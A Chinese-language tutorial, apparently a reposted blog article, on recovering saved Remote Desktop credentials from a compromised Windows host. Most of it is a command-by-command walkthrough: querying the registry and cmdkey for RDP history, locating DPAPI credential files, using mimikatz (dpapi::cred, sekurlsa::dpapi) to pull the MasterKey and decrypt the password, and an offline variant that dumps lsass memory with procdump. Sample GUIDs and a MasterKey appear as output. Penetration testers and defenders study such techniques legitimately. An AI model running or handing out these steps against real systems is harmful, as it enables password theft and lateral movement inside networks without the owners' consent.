获取rdp保存的凭证

这篇具有很好参考价值的文章主要介绍了获取rdp保存的凭证。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

获取用户保存的rdp凭证

当获取到一台windows服务器,可以尝试获取本地远程连接的信息,如果用户在登入rdp时勾选了 允许为我保存凭证的选项,则在该用户本地会生成一个凭证文件,我们只需要破解该凭证文件即可获取其明文密码。

获取rdp保存的凭证

通过注册表 查看 注册表信息,获取rdp的计算机用户名,ip信息

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

/s
查询所有子项和值

获取rdp保存的凭证

通过对任务栏中rdp图标右键 也可查看到历史连接过哪些主机

获取rdp保存的凭证

通过 cmdkey 查看历史连接记录

查看mstsc的连接纪录
cmdkey /list 

获取rdp保存的凭证

远程解密

查找本地的Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

/a
显示受系统保护的操作系统文件

%userprofile%=C:\Users\Administrator
当前用户文件

获取rdp保存的凭证

记录下

70BFA8D6A8521AC99A3EA6E20E7ECBA2

获取该文件的MasterKey的guid

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\70BFA8D6A8521AC99A3EA6E20E7ECBA2"

获取rdp保存的凭证

记录下guid

381ad929-2b95-44dc-bfa2-5e29a0fc26df

用于加密凭据文件70BFA8D6A8521AC99A3EA6E20E7ECBA2的MasterKey的guid就是:{381ad929-2b95-44dc-bfa2-5e29a0fc26df},接下来我们只要从内存中找到这个guid对应的MasterKey的值即可

通过guid获取对应的MasterKey值

mimikatz "privilege::debug" "sekurlsa::dpapi"

获取rdp保存的凭证

记录下MasterKey

17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

最后打开mimikatz通过MasterKey值去解密凭据文件:

dpapi::cred /in:凭据文件路径 /masterky::masterky值

dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\70BFA8D6A8521AC99A3EA6E20E7ECBA2 /masterky:17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证

离线解密

条件:

目标的文件

当前用户内存中的凭证

dump目标lsass内存

procdump64.exe -accepteula -ma lsass.exe lsass1.dump

用mimikatz载入dump回来的内存

privilege::debug
sekurlsa::minidump lsass1.dmp

获取rdp保存的凭证

到了这一步,后面的就和在线获取差不多了。

我们可以输入dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2来获取GUID(这里由于我把Credentials文件放在mimikatz同目录下,所以我用的相对路径)

获取Credentials的GUID:

dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2

Guid:381ad929-2b95-44dc-bfa2-5e29a0fc26df

获取rdp保存的凭证

获取内存中所有的MasterKey,并通过GUID对比得出想要的那一个:

sekurlsa::dpapi

MasterKey
17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证

利用MasterKey解密

dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2 /masterkey:17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证文章来源地址https://www.toymoban.com/news/detail-460314.html

到了这里,关于获取rdp保存的凭证的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 获取RDP凭据密码

    Windows 自带的远程桌面功能非常强大,并且被广泛使用。因此,获取远程桌面凭证可以为渗透测试中的横向移动提供有利条件。横向移动是指在已经渗透到网络内部的情况下,继续在网络内部渗透的过程。通过获取远程桌面凭证,攻击者可以在网络内部移动,以获取更高的权

    2024年02月06日
    浏览(42)
  • 域内密码凭证获取

    Volume Shadow Copy 活动目录数据库 ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。它还包括域中所有用户的哈希值。 ntds.dit文件位置:%SystemRoot%NTDSNTDS.dit system文件位置:%SystemRoot%System32configSystem sam文件位置:%SystemRoot%System32configSAM %SystemRoot%是系统安装

    2024年02月15日
    浏览(46)
  • Jenkins | 获取凭证密码

    目录 方法一:查看所有账号及密码 方法二:查看指定账号密码 Jenkins == 系统管理 == 脚本命令行 直接运行后看下面的输出即可: 按 F12 后获取这段加密后的密码: 然后继续去执行脚本:  完成

    2024年02月16日
    浏览(42)
  • Jenkins | 获取已存在凭证密码

    Jenkins == 系统管理 == 脚本命令行 直接运行后看下面的输出即可: 按 F12 后获取这段加密后的密码: 然后继续去执行脚本:

    2024年02月02日
    浏览(45)
  • windows10企业版开启RDP多用户同时登录

    1、系统属性,开启远程桌面,添加远程桌面登录用户; 2、快捷键win+R,输入 gpedit.msc ,打开本地组策略编辑器。选择“【管理模板】—【Windows组件】—【远程桌面服务】—【远程桌面会话主机】—【连接】 配置【限制连接的数量】,点击“已启用”,其中允许的RD最大连接

    2024年02月12日
    浏览(33)
  • smartbi token回调获取登录凭证漏洞

    2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。 于是研究了下相关补丁并进行分析。 依据补丁分析,得到如下漏洞复现步骤 首先使用python flask搭建一个fake server,上面只注册了/api/v1/configs/engine/smar

    2024年02月11日
    浏览(46)
  • smartbi token回调获取登录凭证漏洞(二)

    2023年8月8日Smartbi官方又修复了一处权限绕过漏洞。该漏洞是上一个 特定场景下设置Token回调地址漏洞 的绕过,未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。 于是研究了下相关补丁并进行分析。 阅读相关补丁,可知此次漏洞与 /smartbix/api/monitor/s

    2024年02月10日
    浏览(36)
  • Windows创建用户,添加到管理员组,添加到远程桌面组、RDP

    在获得反弹shell后无法得到明文密码,无法远程桌面登录 在目标机器创建新的账号,且为管理员账号,可以远程桌面登录

    2024年02月09日
    浏览(49)
  • NC 科目对照表调整了收支项目对应的会计科目生成凭证后,调整后的会计科目在现金流量分析没有生成对应的现金流量,导致凭证保存的时报“错误:现金流量本币金额分析错误!”

    NC 科目对照表调整了收支项目对应的会计科目生成凭证后,调整后的会计科目在现金流量分析没有生成对应的现金流量,导致凭证保存的时报“错误:现金流量本币金额分析错误!” 如下图: 收支项目的“外部律师费”生成的科目是“管理费用外聘顾问中介费审计费”,实际

    2024年02月10日
    浏览(47)
  • 微信小程序接口调用凭证(获取token)auth.getAccessToken接口开发

    小程序接口调用凭证auth.getAccessToken接口规范参考链接 appid :小程序 appId secret :小程序 appSecret grant_type :授权类型,填写 client_credential access_token :获取到的凭证 expires_in :凭证有效时间,单位:秒。目前是7200秒之内的值。 errcode :错误码***(异常情况才会有错误码返回,

    2024年02月15日
    浏览(63)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包